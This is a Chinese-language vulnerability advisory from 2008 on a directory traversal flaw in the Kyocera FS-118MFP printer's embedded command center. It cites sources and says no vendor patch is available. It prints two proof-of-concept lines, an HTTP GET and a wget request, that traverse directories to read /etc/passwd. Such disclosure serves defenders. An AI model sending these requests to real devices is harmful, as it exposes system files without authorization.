发布日期：2008-09-02
更新日期：2008-09-03

受影响系统：

Kyocera Mita FS-118MFP

描述：

---

BUGTRAQ  ID: 30971

Kyocera FS-118MFP是一款多功能的打印机。

KyoceraFS-118MFP打印机所内嵌的命令中心没有正确地过滤用户提交请求便用于显示文件，这允许远程攻击者通过目录遍历攻击读取任意文件内容。

<*来源：Francesco Tornieri
  
  链接：http://secunia.com/advisories/31680/
        http://packetstorm.linuxsecurity.com/0808-exploits/kyocera-traversal.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET /../../../../../../../../../etc/passwd HTTP/1.0
wget http://www.example.com/../../../../../../../../../etc/passwd

建议：

---

厂商补丁：

Kyocera Mita
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.kyoceramita.com/

浏览次数：2309
严重程度：0（网友投票）